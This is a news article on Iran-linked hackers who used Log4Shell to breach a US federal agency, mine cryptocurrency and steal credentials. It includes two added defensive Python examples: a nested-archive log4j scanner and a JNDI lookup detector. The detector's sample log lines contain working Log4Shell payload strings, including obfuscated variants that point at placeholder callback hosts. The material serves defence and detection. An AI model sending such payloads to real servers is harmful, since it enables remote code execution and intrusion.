Iranian hackers use Log4Shell to mine crypto on federal computer system

Written by AJ Vicens

Hackers with ties to the Iranian government broke into a US government agency’s network in early 2022, using a well-known flaw in an open-source software library to install cryptocurrency-mining software and steal credentials, federal cybersecurity officials said Wednesday.

Exploiting the Log4Shell vulnerability, Iranian-backed hackers broke into an unpatched VMware Horizon server in February and then used that access to move laterally within an unidentified federal agency’s network, according to Wednesday’s joint advisory from the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency and the Federal Bureau of Investigation.

On Thursday, the Washington Post reported that the agency involved was the US Merit Systems Protection Board.

When the Log4Shell vulnerability was discovered late last year, security researchers warned that it would likely be exploited for years. The vulnerability affects Log4j, an open-source Java logging library that is almost ubiquitous because software developers have bundled it into a wide range of applications, often several layers deep inside other packages.

Wednesday’s advisory, which comes nearly a year after Log4Shell was discovered, illustrates how difficult it is to fully remediate a vulnerability in a software component this widely deployed.

“Log4Shell is rampant and will exist forever,” said Dan Lorenc, CEO and co-founder of Chainguard, a supply chain cybersecurity company, on Wednesday. “It will remain in every attacker’s toolbox and will continue to be used for access or lateral movement for the foreseeable future.”

Following the disclosure of the flaw in Log4j, CISA ordered the federal agencies under its authority to patch on an emergency timeline, while state-backed hackers immediately began scanning for vulnerable systems to target. Officials warned at the time that a patching sprint was unlikely to find every vulnerable copy of the library, since Log4j is frequently embedded inside third-party software rather than installed on its own, and Wednesday’s advisory is evidence of the gaps that remain.
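The gap the advisory points at is a copy of log4j-core that an inventory never saw because it sits inside a .war or .ear rather than on the filesystem as a bare jar. The following scanner is an added example, not code from the article, CISA or Chainguard: it walks an archive and every nested archive, reads the version from log4j-core’s Maven descriptor (`META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties`), checks whether the `JndiLookup` class that performs the `${jndi:...}` lookup is still present, and flags the Log4Shell-affected version range (2.0-beta9 up to 2.15.0, with the 2.12.2 and 2.3.1 backports excluded). The sample .war it builds in memory is constructed for the demonstration; the class-file bytes inside it are a stand-in, not the real class.

```python
import io
import re
import zipfile

# Markers inside a log4j-core jar: the Maven descriptor carries the version, and
# JndiLookup.class is the class that performs the ${jndi:...} lookup behind Log4Shell.
POM_PATH = 'META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties'
JNDI_CLASS = 'org/apache/logging/log4j/core/lookup/JndiLookup.class'
ARCHIVE_SUFFIXES = ('.jar', '.war', '.ear', '.zip')
_VERSION_RE = re.compile(r'^version=(\S+)', re.MULTILINE)


def vulnerable_to_log4shell(version: str) -> bool:
    """True for log4j-core 2.0-beta9 through 2.14.1, the range affected by CVE-2021-44228.

    2.15.0 fixed the issue on the main line; 2.12.2 (Java 7) and 2.3.1 (Java 6)
    were the backported fixes. Log4j 1.x has no JNDI lookup and is not flagged.
    """
    m = re.match(r'^2\.(\d+)(?:\.(\d+))?(?:-beta(\d+))?', version)
    if not m:
        return False
    minor, patch, beta = int(m.group(1)), int(m.group(2) or 0), m.group(3)
    if minor == 0 and beta is not None:
        return int(beta) >= 9
    if minor >= 15:
        return False
    if (minor == 12 and patch >= 2) or (minor == 3 and patch >= 1):
        return False
    return True


def scan_archive(data: bytes, path: str, findings: list, depth: int = 0) -> None:
    """Recursively look for log4j-core inside an archive and its nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not a zip container (e.g. a stray file named .jar); skip it
    with zf:
        names = set(zf.namelist())
        if POM_PATH in names:
            m = _VERSION_RE.search(zf.read(POM_PATH).decode('utf-8', 'replace'))
            version = m.group(1) if m else 'unknown'
            has_lookup = JNDI_CLASS in names
            findings.append({
                'path': path,
                'version': version,
                'jndi_lookup_present': has_lookup,
                # a jar with the lookup class removed is mitigated even on an old version
                'log4shell': has_lookup and (version == 'unknown' or vulnerable_to_log4shell(version)),
            })
        if depth < 8:  # jar-in-war-in-ear is normal; bound the recursion anyway
            for name in names:
                if name.lower().endswith(ARCHIVE_SUFFIXES):
                    scan_archive(zf.read(name), f'{path}!{name}', findings, depth + 1)


def scan(data: bytes, path: str) -> list:
    """Scan one top-level archive and return findings sorted by nested path."""
    findings = []
    scan_archive(data, path, findings)
    return sorted(findings, key=lambda f: f['path'])


# --- constructed sample: an application .war bundling two log4j-core copies (not real artifacts)
def _make_jar(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_war() -> bytes:
    def log4j_core(version: str) -> bytes:
        return _make_jar({
            POM_PATH: f'#Generated by Maven\nversion={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n',
            JNDI_CLASS: b'\xca\xfe\xba\xbe',  # class-file magic only; a stand-in for the real class
        })
    return _make_jar({
        'WEB-INF/web.xml': '<web-app/>',
        'WEB-INF/lib/log4j-core-2.14.1.jar': log4j_core('2.14.1'),  # the copy a patch sprint missed
        'WEB-INF/lib/log4j-core-2.17.1.jar': log4j_core('2.17.1'),  # the updated copy
    })


if __name__ == '__main__':
    for finding in scan(build_sample_war(), 'app.war'):
        print(finding)
```

Run against a real deployment directory, the same `scan` would be called on every file ending in one of `ARCHIVE_SUFFIXES`; the point of the nested walk is that the 2.14.1 copy above never appears as a file on disk, which is exactly the case a filename-based inventory reports as clean.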

Organizations still running vulnerable versions of Log4j should assume their systems have been compromised and hunt for signs of intrusion rather than only patching, CISA and the FBI said in Wednesday’s advisory.
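“Assume compromise” in practice means going back through web and application logs for the lookup strings that trigger the bug. The detector below is an added example, not part of the advisory or the article: it normalizes the nested-lookup obfuscation that real scanning traffic used (`${${lower:j}ndi:...}`, `${::-j}ndi:...`, `${env:NaN:-j}`) the way Log4j itself would evaluate it, then reports the scheme and callback target of any surviving `${jndi:...}`. The access-log lines it runs over are constructed for the example, with addresses from documentation ranges.

```python
import re

# Innermost ${...} that is not itself a jndi lookup; ${jndi:...} is the signal we want to keep.
_INNER = re.compile(r'\$\{(?![jJ][nN][dD][iI]:)([^${}]*)\}')
# Scheme and callback target of a (now un-obfuscated) JNDI lookup.
_JNDI = re.compile(r'\$\{jndi:([a-z]+):/{0,2}([^/}\s]+)', re.IGNORECASE)


def _resolve(expr: str) -> str:
    """Evaluate one innermost Log4j lookup the way an attacker relies on it evaluating.

    ${x:-d}        -> d   (default-value syntax; x may be empty or an unset variable)
    ${lower:X}     -> x
    ${upper:x}     -> X
    anything else  -> the text after the first ':' (good enough for normalization)
    """
    if ':-' in expr:
        return expr.split(':-', 1)[1]
    prefix, sep, body = expr.partition(':')
    if sep:
        if prefix.lower() == 'lower':
            return body.lower()
        if prefix.lower() == 'upper':
            return body.upper()
        return body
    return expr


def normalize(value: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until only ${jndi:...} (if any) remains."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), value)
        if new == value:
            break
        value = new
    return value


def find_jndi_lookups(lines):
    """Return (line_number, scheme, target) for every line carrying a JNDI lookup string."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in _JNDI.finditer(normalize(line)):
            hits.append((n, m.group(1).lower(), m.group(2)))
    return hits


# Constructed access-log lines (not from any real incident): one clean request, three
# exploitation attempts with increasing obfuscation, and a benign non-JNDI lookup.
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Feb/2022:03:12:41 +0000] "GET /portal/info.jsp HTTP/1.1" 200 1423 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Feb/2022:03:12:42 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.8 - - [15/Feb/2022:03:12:43 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${::-l}dap://198.51.100.8:1389/x}"',
    '198.51.100.9 - - [15/Feb/2022:03:12:44 +0000] "GET /?q=${${env:NaN:-j}${env:NaN:-n}di:rmi://198.51.100.9:1099/Exploit} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '192.0.2.10 - - [15/Feb/2022:03:13:00 +0000] "GET /?d=${date:yyyy} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]


if __name__ == '__main__':
    for line_no, scheme, target in find_jndi_lookups(SAMPLE_LOG):
        print(f'line {line_no}: jndi lookup via {scheme} to {target}')
```

A hit on a host that was unpatched at the time is a lead, not proof of compromise; the target field is what to pivot on next, in outbound connection logs and DNS, since the lookup only does damage if the server actually reached back out to it.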

Iranian hacking groups have relied on unpatched versions of Log4j to gain access to a wide variety of sensitive US systems. In February, Iranian hackers used the vulnerability to gain access to a US aerospace company and a city government’s computer systems, according to a September notice from US and allied cybersecurity agencies. That notice attributed the activity to groups with ties to Iran’s Islamic Revolutionary Guard Corps.

Wednesday’s notice did not name the Iranian group believed to be responsible for the breach, blaming “Iranian government-sponsored APT actors.” APT, short for advanced persistent threat, usually refers to activity sponsored by a state or backed by significant resources. According to the advisory, the attackers relied on commonly available tools to exploit Log4Shell and carry out the operation: XMRig for cryptocurrency mining, PsExec for remote execution and lateral movement, Mimikatz for harvesting credentials, and Ngrok for tunneling traffic back out of the network.

At times, hackers working on behalf of the Iranian government have been accused of more traditional cybercrime, such as ransomware attacks, in operations that have “blurred the lines between electronic crime and espionage,” a researcher told CyberScoop in September. Wednesday’s notice may describe another such operation, in which hacking groups, possibly working at arm’s length from the government, mix espionage and cybercrime.

Updated on November 17, 2022: This story was updated after publication to add new information about the US federal agency allegedly hacked by Iran-linked hackers.

Gordon K. Morehouse